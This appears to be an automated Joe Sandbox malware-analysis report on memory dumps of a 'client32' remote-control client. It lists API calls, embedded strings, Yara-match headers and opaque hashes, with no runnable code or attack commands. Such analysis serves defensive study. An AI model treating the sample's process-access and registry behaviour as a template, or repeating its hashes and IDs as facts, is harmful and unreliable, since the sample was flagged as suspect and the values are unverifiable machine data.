                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle__wcstoi64_memset
                                                                              • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                              • API String ID: 510078033-311296318
                                                                              • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                              • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                              • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                              • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                              • API String ID: 536389180-1339850372
                                                                              • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                              • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                              • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                              • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                              APIs
                                                                              Strings
                                                                              • SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
                                                                              • Warning. simap lock held for %d ms, xrefs: 11107825
                                                                              • Warning. took %d ms to get simap lock, xrefs: 1110773D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                              • String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 3891031082-3311166593
                                                                              • Opcode ID: d169f7d3ec2389e32f8db3f945f37a094bda190619949e4597d4702fbcf04816
                                                                              • Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
                                                                              • Opcode Fuzzy Hash: d169f7d3ec2389e32f8db3f945f37a094bda190619949e4597d4702fbcf04816
                                                                              • Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90
                                                                              APIs
                                                                              • OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
                                                                              • std::exception::exception.LIBCMT ref: 110DD7B8
                                                                              • __CxxThrowException@8.LIBCMT ref: 110DD7D3
                                                                              • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
                                                                              • OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875
                                                                                • Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
                                                                                • Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,EE49F673,?,00000000,00000001), ref: 110D7F8C
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              Strings
                                                                              • NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
                                                                              • NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
                                                                              • NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
                                                                              • NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
                                                                              • API String ID: 477284662-4139260718
                                                                              • Opcode ID: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                              • Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
                                                                              • Opcode Fuzzy Hash: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                              • Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1
                                                                              APIs
                                                                              • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                              • SendMessageA.USER32(00000000,0000004A,00040414,?), ref: 1103D313
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                              • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                              • String ID: CLTCONN.CPP$NSMW16Class
                                                                              • API String ID: 4104200039-3790257117
                                                                              • Opcode ID: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                              • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                              • Opcode Fuzzy Hash: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                              • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                              • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                              • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                              • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 490496107-2775872530
                                                                              • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                              • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                              • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                              • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                              APIs
                                                                              • GetClassNameA.USER32(?,?,00000080), ref: 110416E7
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 11041719
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
                                                                              • LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 110417DD
                                                                              • FreeLibrary.KERNEL32(?), ref: 110417EE
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
                                                                              • String ID: NSSWControl32$pcinssui.exe$psapi.dll
                                                                              • API String ID: 2388757878-1455766584
                                                                              • Opcode ID: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                              • Instruction ID: 52c903991e8a4b03fd7171fe37ee29b83fe9f1de1022b00e10817fd4b2db0e2c
                                                                              • Opcode Fuzzy Hash: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                              • Instruction Fuzzy Hash: 4E411A75E412299FEB10CF65CC94BEAFBB8FB09304F5045E9E91993640D770AA848F50
                                                                              APIs
                                                                              • GetWindowTextLengthA.USER32(?), ref: 11023491
                                                                              • GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
                                                                              • ShowWindow.USER32(00000000), ref: 110234D7
                                                                              • GetDlgItem.USER32(00000000,000013AB), ref: 11023521
                                                                              • ShowWindow.USER32(00000000), ref: 11023524
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetDlgItem.USER32(00000000,?), ref: 1102356B
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 3823882759-1986719024
                                                                              • Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                              • Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
                                                                              • Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                              • Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A78400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • LoadLibraryA.KERNEL32(secur32.dll,EE49F673,?,?,?), ref: 111470D1
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
                                                                              • timeGetTime.WINMM(?,?), ref: 111470FC
                                                                              • timeGetTime.WINMM(?,?), ref: 11147113
                                                                              • GetLastError.KERNEL32(?,?), ref: 11147119
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                                              • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                                              • API String ID: 2282859717-3523682560
                                                                              • Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                              • Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
                                                                              • Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                              • Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
                                                                              • SelectObject.GDI32(?,?), ref: 11037872
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
                                                                              • GetBkColor.GDI32(?), ref: 11037A5C
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9
                                                                                • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
                                                                              • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
                                                                              • DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
                                                                              • DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
                                                                              • SelectObject.GDI32(?,00000000), ref: 11037B49
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
                                                                              • String ID:
                                                                              • API String ID: 649858571-0
                                                                              • Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                              • Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
                                                                              • Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                              • Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
                                                                              APIs
                                                                              • SetFocus.USER32(?), ref: 110254CE
                                                                              • GetDlgItem.USER32(?,00001396), ref: 110254E2
                                                                              • CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
                                                                              • ShowCaret.USER32(00000000), ref: 11025515
                                                                              • DestroyCaret.USER32 ref: 11025529
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Caret$CreateDestroyFocusItemShow
                                                                              • String ID:
                                                                              • API String ID: 3189774202-0
                                                                              • Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                              • Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
                                                                              • Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                              • Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 11035267
                                                                              • _memmove.LIBCMT ref: 1103528B
                                                                              • _memmove.LIBCMT ref: 110352C5
                                                                              • _memmove.LIBCMT ref: 110352E1
                                                                              • std::exception::exception.LIBCMT ref: 1103532B
                                                                              • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                              • String ID: deque<T> too long
                                                                              • API String ID: 827257264-309773918
                                                                              • Opcode ID: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                              • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                              • Opcode Fuzzy Hash: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                              • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 110193F7
                                                                              • _memmove.LIBCMT ref: 1101941B
                                                                              • _memmove.LIBCMT ref: 11019455
                                                                              • _memmove.LIBCMT ref: 11019471
                                                                              • std::exception::exception.LIBCMT ref: 110194BB
                                                                              • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                              • String ID: deque<T> too long
                                                                              • API String ID: 827257264-309773918
                                                                              • Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                              • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                              • Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                              • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                              APIs
                                                                                • Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A
                                                                              • GetWindowRect.USER32(?,?), ref: 111194E1
                                                                              • MapWindowPoints.USER32(00000000,111239E6,?,00000002), ref: 111194FA
                                                                              • GetClientRect.USER32(?,?), ref: 11119508
                                                                              • GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
                                                                              • GetSystemMetrics.USER32(00000003), ref: 11119559
                                                                              • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
                                                                              • GetSystemMetrics.USER32(00000002), ref: 11119576
                                                                              Strings
                                                                              • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                              • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                              • API String ID: 4172599486-2052393828
                                                                              • Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                              • Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
                                                                              • Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                              • Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
                                                                              APIs
                                                                                • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
                                                                                • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
                                                                                • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
                                                                              • wsprintfA.USER32 ref: 1100977F
                                                                              • wsprintfA.USER32 ref: 11009799
                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                              • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                              • API String ID: 559337438-1872371932
                                                                              • Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                              • Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
                                                                              • Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                              • Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                              • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                              • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                              • String ID: 8
                                                                              • API String ID: 762489935-4194326291
                                                                              • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                              • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                              • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                              • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(?), ref: 1100521E
                                                                              • _memset.LIBCMT ref: 11005240
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                              • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                              • EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2755257978-4108050209
                                                                              • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                              • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                              • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                              • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,75920BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A78400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              • LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
                                                                              • lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
